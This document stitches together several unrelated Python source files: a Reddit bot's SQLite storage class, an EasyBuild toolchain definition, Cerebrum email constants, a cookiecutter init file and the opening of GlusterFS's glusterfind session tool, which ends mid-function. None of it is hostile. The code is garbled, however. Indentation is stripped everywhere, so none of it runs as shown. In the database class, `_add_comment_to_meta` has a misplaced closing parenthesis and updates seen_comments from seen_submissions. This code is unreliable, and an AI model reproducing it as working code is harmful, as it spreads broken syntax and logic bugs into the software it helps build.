Helper method for throwing a concrete error if a module has not been registered, yet tries to write into the
database without having a reference.
:param module: A string naming your plugin.
:type module: str
:raise LookupError: If the module doesn't exist, it raises an error.
"""
if not self._check_if_module_exists(module):
raise LookupError('The module where this operation comes from is not registered!')
def get_all_modules(self):
"""
Returns all modules that have been registered so far.
:return: Tuple of tuples ``(_ROWID_, module_name)``
"""
self.cur.execute('SELECT _ROWID_, module_name FROM modules')
return self.cur.fetchall()
def clean_up_database(self, older_than_unixtime):
"""
Cleans up the database, meaning that everything older than the session time and all threads that should be
updated and outlived their lifetime will be deleted.
:param older_than_unixtime: Unix timestamp from which point entries have to be older than to be deleted.
:type older_than_unixtime: int | float
"""
self.cur.execute("""DELETE FROM storage WHERE timestamp < datetime((?), 'unixepoch')""", (older_than_unixtime,))
self.cur.execute("""DELETE FROM update_threads WHERE CURRENT_TIMESTAMP > lifetime""")
self.logger.debug('Database cleanup: All storage items older than '
'{} and all deprecated update-threads removed'.format(older_than_unixtime))
def wipe_module(self, module):
"""
Wipes a module across all tables and all its references.
:param module: A string naming your plugin.
:type module: str
"""
self.cur.execute("""DELETE FROM storage
WHERE bot_module = (SELECT _ROWID_ FROM modules WHERE module_name = (?))""", (module,))
self.cur.execute("""DELETE FROM update_threads
WHERE bot_module = (SELECT _ROWID_ FROM modules WHERE module_name = (?))""", (module,))
self.cur.execute("""DELETE FROM modules WHERE module_name = (?)""", (module,))
self.logger.debug("{} got wiped from all tables and all its references.".format(module))
def add_to_stats(self, id, bot_name, title, username, subreddit, permalink):
"""
Adds a row to the stats, see params (is handled by RedditRover).
:param id: submission or comment id
:type id: str
:param bot_name: Plugin Name
:type bot_name: str
:param title: Title of original submission
:type title: str
:param username: Original Author of responded submission
:type username: str
:param subreddit: Subreddit Name of submission
:type subreddit: str
:param permalink: Permalink to comment or submission the bot has responded upon
:type permalink: str
"""
self.cur.execute('''INSERT INTO stats (id, bot_module, created, title, username, subreddit, permalink)
VALUES ((?),
(SELECT _ROWID_ FROM modules WHERE module_name = (?)),
DATETIME('now'),
(?),
(?),
(?),
(?))''', (id, bot_name, title, username, subreddit, permalink))
def get_all_stats(self):
"""
Returns a tuple of tuple, be warned: ``upvotes_author`` and ``upvotes_bot`` can both be null.
:return: Tuple of tuples: ``(thing_id, module_name, created, title, username, subreddit,
upvotes_author, upvotes_bot)``
"""
self.cur.execute("""SELECT id, module_name, created, title, username, subreddit,
permalink, upvotes_author, upvotes_bot
FROM stats
INNER JOIN modules
ON bot_module = modules._ROWID_""")
return self.cur.fetchall()
def get_total_responses_per_day(self, timestamp):
"""
Gets the total amount of rows for a day. The timestamp has to be in that day to work.
:param timestamp: Unix timestamp of day
:type timestamp: int | float
:return: Tuple with ``(amount of rows,)``
"""
self.cur.execute('''SELECT count(*) FROM stats
WHERE created BETWEEN DATE((?), 'unixepoch') AND DATE((?), 'unixepoch', '+1 day')''',
(timestamp, timestamp))
return self.cur.fetchone()
def get_karma_loads(self):
"""
Returns a tuple with IDs for karma statistics.
:return: Tuple with ``(id,)``
"""
self.cur.execute('''SELECT id FROM stats
WHERE upvotes_author is NULL
AND created < DATETIME('now', '-7 days')''')
return self.cur.fetchall()
def update_karma_count(self, thing_id, author_upvotes, plugin_upvotes):
"""
Updates the karma count for a previously stored response.
:param thing_id: id of submission a plugin has responded on
:type thing_id: str
:param author_upvotes: Amount of upvotes from the author
:type author_upvotes: int
:param plugin_upvotes: Amount of upvotes from the plugin
:type plugin_upvotes: int
"""
self.cur.execute('''UPDATE stats
SET upvotes_author = (?), upvotes_bot = (?)
WHERE id = (?)''', (author_upvotes, plugin_upvotes, thing_id))
def update_karma_count_with_null(self, thing_id, author_upvotes):
"""
Updates only author_upvotes, sometimes plugin responses are already deleted.
:param thing_id: id of submission a plugin has responded on
:type thing_id: str
:param author_upvotes: Amount of upvotes from the author
:type author_upvotes: int
"""
self.cur.execute('''UPDATE stats SET upvotes_author = (?) WHERE id = (?)''', (author_upvotes, thing_id))
def add_message(self, msg_id, bot_module, created, username, title, body):
"""
Upon receiving a message, its contents will be stored in a table for statistical purposes and overview of all
plugins inboxes.
:param msg_id: Unique message id from reddit.
:type msg_id: str
:param bot_module: Plugins Name
:type bot_module: str
:param created: Unix timestamp of messages arrival
:type created: int | float
:param username: Original author of the message
:type username: str
:param title: Subject of said message
:type title: str
:param body: Text body of this message.
:type body: str
"""
self.cur.execute('''INSERT INTO messages (id, bot_module, created, title, author, body)
VALUES ( (?),
(SELECT _ROWID_ FROM modules WHERE module_name = (?)),
DATETIME((?), 'unixepoch'),
(?),
(?),
(?)) ''', (msg_id, bot_module, created, username, title, body))
def get_all_messages(self):
"""
Returns all messages in the messages table.
:return: Tuple of tuples: ``(id, module_name, created, title, author, body)``
"""
self.cur.execute('''SELECT id, module_name, created, title, author, body FROM messages
INNER JOIN modules
ON bot_module = modules._ROWID_
''')
return self.cur.fetchall()
def select_day_from_meta(self, timestamp):
"""
Returns a certain day from the meta_stats.
:param timestamp: Unix timestamp from a certain day. Has to be within that day.
:type timestamp: int | float
:return: Tuple of ``(day, seen_submissions, seen_comment, update_cycles)``
"""
self.cur.execute('''SELECT * FROM meta_stats WHERE day = DATE((?), 'unixepoch')''', (timestamp,))
return self.cur.fetchone()
def add_submission_to_meta(self, count, force=False):
"""
Increases the submission count for this day in a cached fashion.
:param count: Increases current count by this count.
:type count: int
:param force: Forces the write out into the database.
:type force: bool
"""
self.write_out_meta_push(force)
self._meta_push['submissions'] += count
def add_comment_to_meta(self, count, force=False):
"""
Increases the comment count for this day in a cached fashion.
:param count: Increases current count by this count.
:type count: int
:param force: Forces the write out into the database.
:type force: bool
"""
self.write_out_meta_push(force)
self._meta_push['comments'] += count
def add_update_cycle_to_meta(self, count, force=False):
"""
Increases the update cycle count for this day in a cached fashion
:param count: Increases current count by this count.
:type count: int
:param force: Forces the write out into the database.
:type force: bool
"""
self.write_out_meta_push(force)
self._meta_push['cycles'] += count
def _write_out_meta_push(self):
"""
Writes out the values in the meta cache. Reduces the amount of DB requests by a major amount.
"""
for k, count in self._meta_push.items():
if k == 'submissions':
self._add_submission_to_meta(count, self._date * 3600)
if k == 'comments':
self._add_comment_to_meta(count, self._date * 3600)
if k == 'cycles':
self._add_update_cycle_to_meta(count, self._date * 3600)
self._meta_push = {'submissions': 0, 'comments': 0, 'cycles': 0}
def write_out_meta_push(self, force=False):
"""
Checks if the meta cache has to be written - or can be forced.
:param force: Forces the write out
:type force: bool
"""
if force or sum(self._meta_push.values()) >= self._MAX_CACHE:
self._write_out_meta_push()
if not self._date == time.time() // 3600:
self._write_out_meta_push()
self._date = time.time() // 3600
def _add_submission_to_meta(self, count, timestamp):
"""
Increases the submission count for a day.
:param count: Amount of which it should be increased.
:type count: int
:param timestamp: Timestamp that lies in that day it should be increased to.
:type timestamp: int | float
"""
if not self.select_day_from_meta(timestamp):
self.cur.execute('''INSERT INTO meta_stats (day, seen_submissions)
VALUES (DATE((?), 'unixepoch'), (?))''', (timestamp, count))
else:
self.cur.execute('''UPDATE meta_stats SET seen_submissions = seen_submissions + (?)
WHERE day = DATE((?), 'unixepoch')''', (count, timestamp))
def _add_comment_to_meta(self, count, timestamp):
"""
Increases the comment count for a day.
:param count: Amount of which it should be increased.
:type count: int
:param timestamp: Timestamp that lies in that day it should be increased to.
:type timestamp: int | float
"""
if not self.select_day_from_meta(timestamp):
self.cur.execute('''INSERT INTO meta_stats (day, seen_comments)
VALUES (DATE((?), 'unixepoch'), (?))'''), (timestamp, count)
else:
self.cur.execute('''UPDATE meta_stats SET seen_comments = seen_submissions + (?)
WHERE day = DATE((?), 'unixepoch')''', (count, timestamp))
def _add_update_cycle_to_meta(self, count, timestamp):
"""
Increases the update cycle count for a day.
:param count: Amount of which it should be increased.
:type count: int
:param timestamp: Timestamp that lies in that day it should be increased to.
:type timestamp: int | float
"""
if not self.select_day_from_meta(timestamp):
self.cur.execute('''INSERT INTO meta_stats (day, update_cycles)
VALUES (DATE((?), 'unixepoch'), (?))''', (timestamp, count))
else:
self.cur.execute('''UPDATE meta_stats SET update_cycles = update_cycles + (?)
WHERE day = DATE((?), 'unixepoch')''', (count, timestamp))
if __name__ == "__main__":
db = Database()
|
"""
EasyBuild support for gompic compiler toolchain (includes GCC and OpenMPI and CUDA).
:author: Kenneth Hoste (Ghent University)
:author: Fotis Georgatos (Uni.Lu, NTUA)
"""
from easybuild.toolchains.gcccuda import GccCUDA
from easybuild.toolchains.mpi.openmpi import OpenMPI
class Gompic(GccCUDA, OpenMPI):
"""Compiler toolchain with GCC+CUDA and OpenMPI."""
NAME = 'gompic'
SUBTOOLCHAIN = GccCUDA.NAME
|
""" Constant types and common constants for the Email module. """
from Cerebrum import Constants
class _EmailTargetCode(Constants._CerebrumCode):
_lookup_table = '[:table schema=cerebrum name=email_target_code]'
class _EmailDomainCategoryCode(Constants._CerebrumCode):
_lookup_table = '[:table schema=cerebrum name=email_domain_cat_code]'
class _EmailServerTypeCode(Constants._CerebrumCode):
_lookup_table = '[:table schema=cerebrum name=email_server_type_code]'
class _EmailTargetFilterCode(Constants._CerebrumCode):
_lookup_table = '[:table schema=cerebrum name=email_target_filter_code]'
class _EmailSpamLevelCode(Constants._CerebrumCode):
_lookup_table = '[:table schema=cerebrum name=email_spam_level_code]'
def __init__(self, code, level=None, description=None):
super(_EmailSpamLevelCode, self).__init__(code, description)
self.level = level
def insert(self):
self._pre_insert_check()
self.sql.execute("""
INSERT INTO %(code_table)s
(%(code_col)s, %(str_col)s, level, %(desc_col)s)
VALUES
(%(code_seq)s, :str, :level, :desc)""" % {
'code_table': self._lookup_table,
'code_col': self._lookup_code_column,
'str_col': self._lookup_str_column,
'desc_col': self._lookup_desc_column,
'code_seq': self._code_sequence},
{'str': self.str,
'level': self.level,
'desc': self._desc})
def get_level(self):
if self.level is None:
self.level = int(self.sql.query_1("""
SELECT level
FROM %(code_table)s
WHERE code=:code""" % {'code_table': self._lookup_table},
{'code': int(self)}))
return self.level
class _EmailSpamActionCode(Constants._CerebrumCode):
_lookup_table = '[:table schema=cerebrum name=email_spam_action_code]'
class _EmailVirusFoundCode(Constants._CerebrumCode):
_lookup_table = '[:table schema=cerebrum name=email_virus_found_code]'
class _EmailVirusRemovedCode(Constants._CerebrumCode):
_lookup_table = '[:table schema=cerebrum name=email_virus_removed_code]'
class EmailConstants(Constants.Constants):
# TODO: Clean up these constants! And do it in a way that lets
# us import system specific constants
EmailTarget = _EmailTargetCode
EmailDomainCategory = _EmailDomainCategoryCode
EmailServerType = _EmailServerTypeCode
EmailSpamLevel = _EmailSpamLevelCode
EmailSpamAction = _EmailSpamActionCode
EmailTargetFilter = _EmailTargetFilterCode
EmailVirusFound = _EmailVirusFoundCode
EmailVirusRemoved = _EmailVirusRemovedCode
entity_email_domain = Constants._EntityTypeCode(
'email_domain',
'Email domain - see table "cerebrum.email_domain" and friends.')
entity_email_address = Constants._EntityTypeCode(
'email_address',
'Email address - see table "cerebrum.email_address" and friends.')
entity_email_target = Constants._EntityTypeCode(
'email_target',
'Email target - see table "cerebrum.email_target" and friends.')
email_domain_category_noexport = _EmailDomainCategoryCode(
'noexport',
'Addresses in these domains can be defined, but are not'
' exported to the mail system. This is useful for'
' pre-defining addresses prior to taking over a new'
' maildomain.')
email_domain_category_cnaddr = _EmailDomainCategoryCode(
'cnaddr',
"Primary user addresses in these domains will be based on the"
" owner's full common name, and not just e.g. the username.")
email_domain_category_uidaddr = _EmailDomainCategoryCode(
'uidaddr',
'Primary user addresses in these domains will be in the format'
'username@domain.')
email_domain_category_include_all_uids = _EmailDomainCategoryCode(
'all_uids',
'All account email targets should get a valid address in this domain,'
' on the form <accountname@domain>.')
email_target_account = _EmailTargetCode(
'account',
"Target is the local delivery defined for the PosixUser whose"
" account_id == email_target.using_uid.")
# exchange-related-jazz
email_target_dl_group = _EmailTargetCode(
'group',
"Target is the Exchange - local delivery defined for"
" the DistributionGroup with"
" group_id == email_target.using_uid.")
email_target_deleted = _EmailTargetCode(
'deleted',
"Target type for addresses that are no longer working, but"
" for which it is useful to include a short custom text in"
" the error message returned to the sender. The text"
" is taken from email_target.alias_value")
email_target_forward = _EmailTargetCode(
'forward',
"Target is a pure forwarding mechanism; local deliveries will"
" only occur as indirect deliveries to the addresses forwarded"
" to. Both email_target.target_entity_id, email_target.using_uid and"
" email_target.alias_value should be NULL, as they are ignored."
" The email address(es) to forward to is taken from table"
" email_forward.")
email_target_file = _EmailTargetCode(
'file',
"Target is a file. The absolute path of the file is gathered"
" from email_target.alias_value. Iff email_target.using_uid"
" is set, deliveries to this target will be run as that"
" PosixUser.")
email_target_pipe = _EmailTargetCode(
'pipe',
"Target is a shell pipe. The command (and args) to pipe mail"
" into is gathered from email_target.alias_value. Iff"
" email_target.using_uid is set, deliveries to this target"
" will be run as that PosixUser.")
email_target_RT = _EmailTargetCode(
'RT',
"Target is a RT queue. The command (and args) to pipe mail"
" into is gathered from email_target.alias_value. Iff"
" email_target.using_uid is set, deliveries to this target"
" will be run as that PosixUser.")
email_target_Sympa = _EmailTargetCode(
'Sympa',
"Target is a Sympa mailing list. The command (and args) to"
" pipe mail into is gathered from email_target.alias_value."
" Iff email_target.using_uid is set, deliveries to this target"
" will be run as that PosixUser.")
email_target_multi = _EmailTargetCode(
'multi',
"Target is the set of `account`-type targets corresponding to"
" the Accounts that are first-level members of the Group that"
" has group_id == email_target.target_entity_id.")
email_server_type_nfsmbox = _EmailServerTypeCode(
'nfsmbox',
"Server delivers mail as mbox-style mailboxes over NFS.")
email_server_type_cyrus = _EmailServerTypeCode(
'cyrus_IMAP',
"Server is a Cyrus IMAP server, which keeps mailboxes in a "
"Cyrus-specific format.")
email_server_type_sympa = _EmailServerTypeCode(
'sympa',
"Server is a Sympa mailing list server.")
email_server_type_exchange = _EmailServerTypeCode(
'exchange',
"Exchange server.")
email_target_filter_greylist = _EmailTargetFilterCode(
'greylist',
"Delay messages from unknown servers")
email_target_filter_uioonly = _EmailTargetFilterCode(
'uioonly',
"Only accept the use of an UiO address as sender address"
" on the UiO network, or when using authenticated SMTP")
email_target_filter_internalonly = _EmailTargetFilterCode(
'internalonly',
"Only route internal mail. External mail is rejected")
class CLConstants(Constants.CLConstants):
# ChangeTypes used by the email module
# TODO: Put these in it's own file? Put that file and this file into
# Cerebrum/modules/email/?
# email domain
email_dom_add = Constants._ChangeTypeCode(
'email_domain', 'add', 'add email domain %(subject)s',
'name=%(string:new_domain_name)')
email_dom_rem = Constants._ChangeTypeCode(
'email_domain', 'remove', 'remove email domain %(subject)s',
'name=%(string:del_domain')
# either domain name or domain description has been changed
email_dom_mod = Constants._ChangeTypeCode(
'email_domain', 'modify', 'modify email domain %(subject)s',
('name=%(string:new_domain_name)',
'desc=%(string:new_domain_desc'))
email_dom_addcat = Constants._ChangeTypeCode(
'email_domain_category', 'add', 'add category in email domain'
' %(subject)s',
'cat=%(int:cat)')
email_dom_remcat = Constants._ChangeTypeCode(
'email_domain_category', 'remove', 'remove category in email domain'
' %(subject)s',
'cat=%(int:cat)')
# email target
email_target_add = Constants._ChangeTypeCode(
'email_target', 'add', 'add email target %(subject)s', )
email_target_rem = Constants._ChangeTypeCode(
'email_target', 'remove', 'remove email target %(subject)s')
email_target_mod = Constants._ChangeTypeCode(
'email_target', 'modify', 'modify email target %(subject)s',
('type=id:%(int:target_type)s',
'server=id:%(int:server_id)s', ))
# email address
email_address_add = Constants._ChangeTypeCode(
'email_address', 'add', 'add email address %(subject)s',
('lp=%(string:lp)s',
'domain=%(int:dom_id)s'))
email_address_rem = Constants._ChangeTypeCode(
'email_address', 'remove', 'remove email address %(subject)s',
('lp=%(string:lp)s',
'domain=%(int:dom_id)s'))
email_address_mod = Constants._ChangeTypeCode(
'email_address', 'mod', 'modify email address %(subject)s',
('lp=%(string:lp)s',
'domain=%(int:dom_id)s'))
# email entity domain affiliation
email_entity_dom_add = Constants._ChangeTypeCode(
'email_entity_domain', 'add', 'add domain aff for %(subject)s',
'affiliation=%(int:aff)')
email_entity_dom_rem = Constants._ChangeTypeCode(
'email_entity_domain', 'remove', 'remove domain aff for %(subject)s')
email_entity_dom_mod = Constants._ChangeTypeCode(
'email_entity_domain', 'modify', 'modify domain aff for %(subject)s',
'affiliation=%(int:aff)')
# email quota (subject here is an email_target)
email_quota_add = Constants._ChangeTypeCode(
'email_quota', 'add', 'add quota for %(subject)s',
('soft=%(int:soft)',
'hard=%(int:hard)'))
email_quota_rem = Constants._ChangeTypeCode(
'email_quota', 'remove', 'remove quota for %(subject)s')
email_quota_mod = Constants._ChangeTypeCode(
'email_quota', 'modify', 'modify quota for %(subject)s',
('soft=%(int:soft)',
'hard=%(int:hard)'))
# email target filter
email_tfilter_add = Constants._ChangeTypeCode(
'email_tfilter', 'add', 'add tfilter for %(subject)s',
'filter=%(int:filter)')
email_tfilter_rem = Constants._ChangeTypeCode(
'email_tfilter', 'remove', 'remove tfilter for %(subject)s',
'filter=%(int:filter)')
# email spam_filter
email_sfilter_add = Constants._ChangeTypeCode(
'email_sfilter', 'add', 'add sfilter for %(subject)s',
('level=%(int:level)',
'action=%(int:action)'))
email_sfilter_mod = Constants._ChangeTypeCode(
'email_sfilter', 'modify', 'modify sfilter for %(subject)s',
('level=%(int:level)',
'action=%(int:action)'))
# email virus scan
email_scan_add = Constants._ChangeTypeCode(
'email_scan', 'add', 'add scan for %(subject)s',
('found=%(int:found)',
'removed=%(int:removed)',
'enable=%(int:enable)'))
email_scan_mod = Constants._ChangeTypeCode(
'email_scan', 'modify', 'modify scan for %(subject)s')
# email forward (subject here is an email_target)
email_forward_add = Constants._ChangeTypeCode(
'email_forward', 'add',
'add forward for %(subject)s',
('forward=%(string:forward)s',
'enable=%(bool:enable)s'))
email_forward_rem = Constants._ChangeTypeCode(
'email_forward', 'remove',
'remove forward for %(subject)s',
('forward=%(string:forward)s', ))
email_forward_enable = Constants._ChangeTypeCode(
'email_forward', 'enable',
'enable forward for %(subject)s',
('forward=%(string:forward)s',
'cat=%(int:cat)s'))
email_forward_disable = Constants._ChangeTypeCode(
'email_forward', 'disable',
'disable forward for %(subject)s',
('forward=%(string:forward)s',
'cat=%(int:cat)s'))
# Local delivery of email forwards
email_local_delivery = Constants._ChangeTypeCode(
'email_forward_local_delivery', 'set',
'modify local delivery for subject %(subject)s',
('enabled=%(string:enabled)s', ))
# email primary address target (subject here is an email_target)
email_primary_address_add = Constants._ChangeTypeCode(
'email_primary_address', 'add',
'add primary address for %(subject)s', 'primary=%(int:addr_id)')
email_primary_address_rem = Constants._ChangeTypeCode(
'email_primary_address', 'remove',
'remove primary address for %(subject)s', 'primary=%(int:addr_id)')
email_primary_address_mod = Constants._ChangeTypeCode(
'email_primary_address', 'modify',
'modify primary address for %(subject)s', 'primary=%(int:addr_id)')
# email server (subject here is an e-mail server)
email_server_add = Constants._ChangeTypeCode(
'email_server', 'add', 'add email server %(subject)s',
'type=%(int:server_type)')
email_server_rem = Constants._ChangeTypeCode(
'email_server', 'remove', 'remove email server %(subject)s',
'type=%(int:server_type)')
email_server_mod = Constants._ChangeTypeCode(
'email_server', 'modify', 'modify email server %(subject)s',
'type=%(int:server_type)')
|
"""{{ cookiecutter.site_name }}."""
from __future__ import absolute_import, print_function
from .version import __version__
__all__ = ('__version__',)
|
import sys
from errno import ENOENT, ENOTEMPTY
import time
from multiprocessing import Process
import os
import xml.etree.cElementTree as etree
from argparse import ArgumentParser, RawDescriptionHelpFormatter, Action
import logging
import shutil
from utils import execute, is_host_local, mkdirp, fail
from utils import setup_logger, human_time, handle_rm_error
from utils import get_changelog_rollover_time, cache_output, create_file
import conf
from changelogdata import OutputMerger
PROG_DESCRIPTION = """
GlusterFS Incremental API
"""
ParseError = etree.ParseError if hasattr(etree, 'ParseError') else SyntaxError
logger = logging.getLogger()
node_outfiles = []
vol_statusStr = ""
class StoreAbsPath(Action):
def __init__(self, option_strings, dest, nargs=None, **kwargs):
super(StoreAbsPath, self).__init__(option_strings, dest, **kwargs)
def __call__(self, parser, namespace, values, option_string=None):
setattr(namespace, self.dest, os.path.abspath(values))
def get_pem_key_path(session, volume):
return os.path.join(conf.get_opt("session_dir"),
session,
volume,
"%s_%s_secret.pem" % (session, volume))
def node_cmd(host, host_uuid, task, cmd, args, opts):
"""
Runs command via ssh if host is not local
"""
localdir = is_host_local(host_uuid)
# this is so to avoid deleting the ssh keys on local node which otherwise
# cause ssh password prompts on the console (race conditions)
# mode_delete() should be cleaning up the session tree
if localdir and task == "delete":
return
pem_key_path = get_pem_key_path(args.session, args.volume)
if not localdir:
# prefix with ssh command if not local node
cmd = ["ssh",
"-i", pem_key_path,
"root@%s" % host] + cmd
execute(cmd, exit_msg="%s - %s failed" % (host, task), logger=logger)
if opts.get("copy_outfile", False):
cmd_copy = ["scp",
"-i", pem_key_path,
"root@%s:/%s" % (host, opts.get("node_outfile")),
os.path.dirname(opts.get("node_outfile"))]
execute(cmd_copy, exit_msg="%s - Copy command failed" % host,
logger=logger)
def run_cmd_nodes(task, args, **kwargs):
global node_outfiles
nodes = get_nodes(args.volume)
pool = []
for num, node in enumerate(nodes):
host, brick = node[1].split(":")
host_uuid = node[0]
cmd = []
opts = {}
node_outfile = os.path.join(conf.get_opt("working_dir"),
args.session, args.volume,
"tmp_output_%s" % num)
if task == "pre":
if vol_statusStr != "Started":
fail("Volume %s is not online" % args.volume,
logger=logger)
# If Full backup is requested or start time is zero, use brickfind
change_detector = conf.get_change_detector("changelog")
if args.full:
change_detector = conf.get_change_detector("brickfind")
node_outfiles.append(node_outfile)
cmd = [change_detector,
args.session,
args.volume,
brick,
node_outfile,
str(kwargs.get("start")),
"--output-prefix",
args.output_prefix] + \
(["--debug"] if args.debug else []) + \
(["--only-namespace-changes"] if args.only_namespace_changes
else [])
opts["node_outfile"] = node_outfile
opts["copy_outfile"] = True
elif task == "cleanup":
# After pre run, cleanup the working directory and other temp files
# Remove the copied node_outfile in main node
try:
os.remove(node_outfile)
except (OSError, IOError):
logger.warn("Failed to cleanup temporary file %s" %
node_outfile)
pass
cmd = [conf.get_opt("nodeagent"),
"cleanup",
args.session,
args.volume] + (["--debug"] if args.debug else [])
elif task == "create":
if vol_statusStr != "Started":
fail("Volume %s is not online" % args.volume,
logger=logger)
# When glusterfind create, create session directory in
# each brick nodes
cmd = [conf.get_opt("nodeagent"),
"create",
args.session,
args.volume,
brick,
kwargs.get("time_to_update")] + \
(["--debug"] if args.debug else []) + \
(["--reset-session-time"] if args.reset_session_time
else [])
elif task == "post":
# Rename pre status file to actual status file in each node
cmd = [conf.get_opt("nodeagent"),
"post",
args.session,
args.volume,
brick] + \
(["--debug"] if args.debug else [])
elif task == "delete":
# When glusterfind delete, cleanup all the session files/dirs
# from each node.
cmd = [conf.get_opt("nodeagent"),
"delete",
args.session,
args.volume] + \
(["--debug"] if args.debug else [])
if cmd:
p = Process(target=node_cmd,
args=(host, host_uuid, task, cmd, args, opts))
p.start()
pool.append(p)
for num, p in enumerate(pool):
p.join()
if p.exitcode != 0:
logger.warn("Command %s failed in %s" % (task, nodes[num][1]))
if task in ["create", "delete"]:
fail("Command %s failed in %s" % (task, nodes[num][1]))
elif task == "pre" and args.disable_partial:
sys.exit(1)
@cache_output
def get_nodes(volume):
"""
Get the gluster volume info xml output and parse to get
the brick details.
"""
global vol_statusStr
cmd = ["gluster", 'volume', 'info', volume, "--xml"]
_, data, _ = execute(cmd,
exit_msg="Failed to Run Gluster Volume Info",
logger=logger)
tree = etree.fromstring(data)
# Test to check if volume has been deleted after session creation
count_el = tree.find('volInfo/volumes/count')
if int(count_el.text) == 0:
fail("Unable to get volume details", logger=logger)
# this status is used in caller: run_cmd_nodes
vol_statusStr = tree.find('volInfo/volumes/volume/statusStr').text
nodes = []
volume_el = tree.find('volInfo/volumes/volume')
try:
for b in volume_el.findall('bricks/brick'):
nodes.append((b.find('hostUuid').text,
b.find('name').text))
except (ParseError, AttributeError, ValueError) as e:
fail("Failed to parse Volume Info: %s" % e, logger=logger)
return nodes
def _get_args():
parser = ArgumentParser(formatter_class=RawDescriptionHelpFormatter,
description=PROG_DESCRIPTION)
subparsers = parser.add_subparsers(dest="mode")
# create <SESSION> <VOLUME> [--debug] [--force]
parser_create = subparsers.add_parser('create')
parser_create.add_argument("session", help="Session Name")
parser_create.add_argument("volume", help="Volume Name")
parser_create.add_argument("--debug", help="Debug", action="store_true")
parser_create.add_argument("--force", help="Force option to recreate "
"the session", action="store_true")
parser_create.add_argument("--reset-session-time",
help="Reset Session Time to Current Time",
action="store_true")
# delete <SESSION> <VOLUME> [--debug]
parser_delete = subparsers.add_parser('delete')
parser_delete.add_argument("session", help="Session Name")
parser_delete.add_argument("volume", help="Volume Name")
parser_delete.add_argument("--debug", help="Debug", action="store_true")
# list [--session <SESSION>] [--volume <VOLUME>]
parser_list = subparsers.add_parser('list')
parser_list.add_argument("--session", help="Session Name", default="")
parser_list.add_argument("--volume", help="Volume Name", default="")
parser_list.add_argument("--debug", help="Debug", action="store_true")
# pre <SESSION> <VOLUME> <OUTFILE>
# [--output-prefix <OUTPUT_PREFIX>] [--full]
parser_pre = subparsers.add_parser('pre')
parser_pre.add_argument("session", help="Session Name")
parser_pre.add_argument("volume", help="Volume Name")
parser_pre.add_argument("outfile", help="Output File", action=StoreAbsPath)
parser_pre.add_argument("--debug", help="Debug", action="store_true")
parser_pre.add_argument("--full", help="Full find", action="store_true")
parser_pre.add_argument("--disable-partial", help="Disable Partial find, "
"Fail when one node fails", action="store_true")
parser_pre.add_argument("--output-prefix", help="File prefix in output",
default=".")
parser_pre.add_argument("--regenerate-outfile",
help="Regenerate outfile, discard the outfile "
"generated from last pre command",
action="store_true")
parser_pre.add_argument("-N", "--only-namespace-changes",
help="List only namespace changes",
action="store_true")
# post <SESSION> <VOLUME>
parser_post = subparsers.add_parser('post')
parser_post.add_argument("session", help="Session Name")
parser_post.add_argument("volume", help="Volume Name")
parser_post.add_argument("--debug", help="Debug", action="store_true")
return parser.parse_args()
def ssh_setup(args):
pem_key_path = get_pem_key_path(args.session, args.volume)
if not os.path.exists(pem_key_path):
# Generate ssh-key
cmd = ["ssh-keygen",
"-N",
"",
"-f",
pem_key_path]
execute(cmd,
exit_msg="Unable to generate ssh key %s"
% pem_key_path,
logger=logger)
logger.info("Ssh key generated %s" % pem_key_path)
try:
shutil.copyfile(pem_key_path + ".pub",
os.path.join(conf.get_opt("session_dir"),
".keys",
"%s_%s_secret.pem.pub" % (args.session,
args.volume)))
except (IOError, OSError) as e:
fail("Failed to copy public key to %s: %s"
% (os.path.join(conf.get_opt("session_dir"), ".keys"), e),
logger=logger)
# Copy pub file to all nodes
cmd = ["gluster",
"system::",
"copy",
"file",
"/glusterfind/.keys/%s.pub" % os.path.basename(pem_key_path)]
execute(cmd, exit_msg="Failed to distribute ssh keys", logger=logger)
logger.info("Distributed ssh key to all nodes of Volume")
# Add to authorized_keys file in each node
cmd = ["gluster",
"system::",
"execute",
"add_secret_pub",
"root",
"/glusterfind/.keys/%s.pub" % os.path.basename(pem_key_path)]
execute(cmd,
exit_msg="Failed to add ssh keys to authorized_keys file",
logger=logger)
logger.info("Ssh key added to authorized_keys of Volume nodes")
def mode_create(session_dir, args):
logger.debug("Init is called - Session: %s, Volume: %s"
% (args.session, args.volume))
cmd = ["gluster", 'volume', 'info', args.volume, "--xml"]
_, data, _ = execute(cmd,
exit_msg="Failed to Run Gluster Volume Info",
logger=logger)
try:
tree = etree.fromstring(data)
statusStr = tree.find('volInfo/volumes/volume/statusStr').text
except (ParseError, AttributeError) as e:
fail("Invalid Volume: %s" % e, logger=logger)
if statusStr != "Started":
fail("Volume %s is not online" % args.volume, logger=logger)
mkdirp(session_dir, exit_on_err=True, logger=logger)
mkdirp(os.path.join(session_dir, args.volume), exit_on_err=True,
logger=logger)
status_file = os.path.join(session_dir, args.volume, "status")
if os.path.exists(status_file) and not args.force:
fail("Session %s already created" % args.session, logger=logger)
if not os.path.exists(status_file) or args.force:
ssh_setup(args)
execute(["gluster", "volume", "set",
args.volume, "build-pgfid", "on"],
exit_msg="Failed to set volume option build-pgfid on",
logger=logger)
logger.info("Volume option set %s, build-pgfid on" % args.volume)
execute(["gluster", "volume", "set",
args.volume, "changelog.changelog", "on"],
exit_msg="Failed to set volume option "
"changelog.changelog on", logger=logger)
logger.info("Volume option set %s, changelog.changelog on"
% args.volume)
execute(["gluster", "volume", "set",
args.volume, "changelog.capture-del-path", "on"],
exit_msg="Failed to set volume option "
"changelog.capture-del-path on", logger=logger)
logger.info("Volume option set %s, changelog.capture-del-path on"
% args.volume)
# Add Rollover time to current time to make sure changelogs
# will be available if we use this time as start time
time_to_update = int(time.time()) + get_changelog_rollover_time(
args.volume)
run_cmd_nodes("create", args, time_to_update=str(time_to_update))
if not os.path.exists(status_file) or args.reset_session_time:
with open(status_file, "w", buffering=0) as f:
f.write(str(time_to_update))
sys.stdout.write("Session %s created with volume %s\n" %
(args.session, args.volume))
sys.exit(0)
def mode_pre(session_dir, args):
"""
Read from Session file and write to session.pre file
"""
endtime_to_update = int(time.time()) - get_changelog_rollover_time(
args.volume)
status_file = os.path.join(session_dir, args.volume, "status")
status_file_pre = status_file + ".pre"
mkdirp(os.path.dirname(args.outfile), exit_on_err=True, logger=logger)
# If Pre status file exists and running pre command again
if os.path.exists(status_file_pre) and not args.regenerate_outfile:
fail("Post command is not run after last pre, "
"use --regenerate-outfile")
start = 0
try:
with open(status_file) as f:
start = int(f.read().strip())
except ValueError:
pass
except (OSError, IOError) as e:
fail("Error Opening Session file %s: %s"
% (status_file, e), logger=logger)
logger.debug("Pre is called - Session: %s, Volume: %s, "
"Start time: %s, End time: %s"
% (args.session, args.volume, start, endtime_to_update))
